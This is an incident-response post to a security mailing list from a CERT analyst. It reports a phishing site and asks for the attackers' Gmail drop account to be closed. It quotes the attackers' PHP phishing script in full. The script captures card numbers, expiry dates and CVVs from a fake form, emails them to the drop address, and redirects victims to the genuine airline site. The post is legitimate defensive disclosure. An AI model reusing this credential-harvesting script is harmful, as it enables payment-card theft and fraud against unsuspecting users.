[nsp-sec] Phishing-Dropbox @gmail.com

Torsten Voss voss at dfn-cert.de
Mon Jun 4 06:31:39 EDT 2012


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

we've found a phishing site with scripts of the attackers. The credentials
were sent to 'spymove at gmail.com'.

Please close this account.

Kind regards,
  Torsten, AS680



<?php

if ( $_SERVER['REQUEST_METHOD'] == 'POST' ) {
$nome_site = 'by M4F10S0';
$email_site = 'spymove at gmail.com';
$email_send = 'spymove at gmail.com';

$nome = $_POST['nome'];
$numero = $_POST['numero'];
$bandeira = $_POST['bandeira'];
$mes = $_POST['mes'];
$ano = $_POST['ano'];
$cvv = $_POST['cvv'];
$assunto = "$$$ Tamo Rico . $bandeira";

if ( strpos( $_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME'] ) > 0 ) { // checks whether the server hosting the form is the same one that called it; if this is a data injection attack this value will be different
ini_set( 'sendmail_from', $email_site );

$msg = "Data: ".date("d/m/Y")." <br> Horário: ".date("H:i:s")."<br>";
while( list( $campo, $valor ) = each( $HTTP_POST_VARS ) ) {
$msg .= "".ucwords($campo).": ".$valor."<br>";
}
$cabecalho = "Return-Path: ".$nome." <".$nome.">\r\n";
$cabecalho .= "From: ".$email_send." <".$bandeira.">\r\n";
$cabecalho .= "X-Priority: 3\r\n";
$cabecalho .= "X-Mailer: Formmail [version 1.0]\r\n";
$cabecalho .= "MIME-Version: 1.0\r\n";
$cabecalho .= "Content-Transfer-Encoding: 8bit\r\n";
$cabecalho .= 'Content-Type: text/html; charset="iso-8859-1"';
mail( $email_site, $assunto, $msg, $cabecalho );
header("Location: http://www.tam.com.br");
} else {
die( 'Detectada tentativa de injeção de dados, seu ip foi logado e
tomaremos as providencias legais' );
}
}
?>

- -- 
Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634

DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone  +49 40 808077-590
Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.:  DE 232129737
Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk/MjooACgkQLn8qYyAllOQaIACgjLFp491Vt5n+7ETT0mXXT4Nh
2JcAn0sLxLcpyS8KTFSY+asb4wjl3Egu
=n0Ya
-----END PGP SIGNATURE-----


